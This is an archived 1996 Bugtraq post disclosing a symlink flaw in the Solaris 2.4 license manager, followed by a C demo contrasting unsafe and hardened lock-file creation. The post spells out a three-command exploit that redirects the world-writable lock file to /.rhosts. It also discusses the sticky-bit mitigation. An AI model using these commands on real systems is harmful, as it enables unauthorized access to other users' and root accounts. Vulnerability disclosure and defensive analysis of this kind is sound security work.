Bugtraq mailing list archives
Re: solaris 2.4 license-manager bug
From: jhoward () agso gov au (Jeffrey Howard)
Date: Thu, 17 Oct 1996 12:45:01 +1000
Another bug for Solaris 2.4.

The license manager must be running; expect both lmgrd.ste & suntechd to be
somewhere in your process table.

/var/tmp/locksuntechd will be created by anyone who runs lmstat, with perms
666, and it is quite happy to follow symlinks.

Anyway, here's the exploit.

-+-+-+ CUT
# 1. remove the existing lock file (if any) from the world-writable directory
rm /var/tmp/locksuntechd
# 2. plant a symlink at the lock path pointing at the file you want created/truncated
ln -s /.rhosts /var/tmp/locksuntechd
# 3. run lmstat; it creates the "lock" through the symlink with mode 666
lmstat -c <insert your license file name here>

NOTES
lmstat could be anywhere on your filesystem; try /etc/opt/licenses.
I found that sometimes this didn't work the first time: it didn't create the
file. Just run lmstat again and it'll work.
Some observations ...

Lock files are created by the lmgrd process for each license daemon process
it manages when it starts. These lock files are generally owned by root, the
id under which they were started. If the sticky bit is set on the /var/tmp
directory, no normal user will be able to remove the lock file, thus breaking
step 1 of the exploit.

Perhaps there is a window of opportunity if you can create the symbolic link
before the licence manager starts up. Given that the licence manager generally
kicks off at boot, and the /tmp directories will be flushed during startup,
this might also be difficult to pull off.

---
Cheers,
jhoward () agso gov au
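The lock-file creation the post describes, as an added example in C that is not from the post or from the Solaris license manager: a naive creator that opens the lock with O_CREAT and mode 0666 (and so follows a planted symlink exactly as /var/tmp/locksuntechd -> /.rhosts would) beside a hardened creator that uses O_EXCL | O_NOFOLLOW and a mode without group/world write. The mkdtemp() scratch directory, the names locksuntechd and rhosts inside it, and the use of O_NOFOLLOW (a flag the 1996 Solaris API did not have) are assumptions of the demo; nothing touches the real /var/tmp or /.rhosts.

```c
#define _GNU_SOURCE            /* glibc: exposes O_NOFOLLOW and mkdtemp() */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Lock creation as the post describes it: O_CREAT without O_EXCL, mode 0666.
 * If `path` is a symlink, open() follows it and creates or truncates the
 * target with the caller's privileges. */
static int create_lock_naive(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

/* Hardened creation: O_EXCL fails if anything already exists at `path`
 * (a dangling symlink counts), O_NOFOLLOW refuses to traverse a symlink
 * at the last component, and 0644 grants no group/world write. */
static int create_lock_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

/* Scratch layout (assumed for the demo): a private mkdtemp() directory
 * holding locksuntechd -> rhosts, mirroring /var/tmp/locksuntechd -> /.rhosts. */
struct scratch { char dir[64]; char lock[128]; char target[128]; };

static int setup(struct scratch *s)
{
    snprintf(s->dir, sizeof s->dir, "/tmp/lockdemo.XXXXXX");
    if (mkdtemp(s->dir) == NULL) return -1;
    snprintf(s->lock, sizeof s->lock, "%s/locksuntechd", s->dir);
    snprintf(s->target, sizeof s->target, "%s/rhosts", s->dir);
    return symlink(s->target, s->lock);   /* the attacker's planted link */
}

static void teardown(const struct scratch *s)
{
    unlink(s->lock);
    unlink(s->target);
    rmdir(s->dir);
}

/* 1 if the naive creator wrote through the planted symlink (target appeared). */
int naive_creates_target(void)
{
    struct scratch s;
    if (setup(&s) != 0) return -1;
    int rc = create_lock_naive(s.lock);
    int hit = (rc == 0 && access(s.target, F_OK) == 0);
    teardown(&s);
    return hit;
}

/* 1 if the hardened creator refused the symlink and the target never appeared. */
int safe_refuses_symlink(void)
{
    struct scratch s;
    if (setup(&s) != 0) return -1;
    int rc = create_lock_safe(s.lock);
    int ok = (rc != 0 && access(s.target, F_OK) != 0);
    teardown(&s);
    return ok;
}

/* 1 if, with nothing planted, the hardened creator makes a regular file
 * that is not group- or world-writable (exact mode depends on umask). */
int safe_creates_plain_lock(void)
{
    struct scratch s;
    struct stat st;
    if (setup(&s) != 0) return -1;
    unlink(s.lock);                       /* drop the planted link first */
    int rc = create_lock_safe(s.lock);
    int ok = (rc == 0 && lstat(s.lock, &st) == 0 && S_ISREG(st.st_mode)
              && (st.st_mode & 022) == 0);
    teardown(&s);
    return ok;
}

int main(void)
{
    printf("naive creator followed the symlink:    %d\n", naive_creates_target());
    printf("hardened creator refused the symlink:  %d\n", safe_refuses_symlink());
    printf("hardened creator made a plain lock:    %d\n", safe_creates_plain_lock());
    return 0;
}
```

The O_EXCL check is what matters most: POSIX requires open() with O_CREAT | O_EXCL to fail with EEXIST when the path names a symbolic link, whatever the link points at, so even without O_NOFOLLOW the hardened creator cannot be steered onto /.rhosts. The sticky bit on /var/tmp that the post's observations mention is the complementary defence on the directory side: it stops an ordinary user from removing a root-owned lock in step 1 of the exploit, while O_EXCL stops the daemon from writing through a link that was planted before the lock ever existed.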
Current thread:
- Re: solaris 2.4 license-manager bug Jeffrey Howard (Oct 16)
- Re: solaris 2.4 license-manager bug Herold Heiko (Oct 17)
- FTPD Discussion Aleph One (Oct 17)
- <Possible follow-ups>
- Re: solaris 2.4 license-manager bug Jeffrey Howard (Oct 17)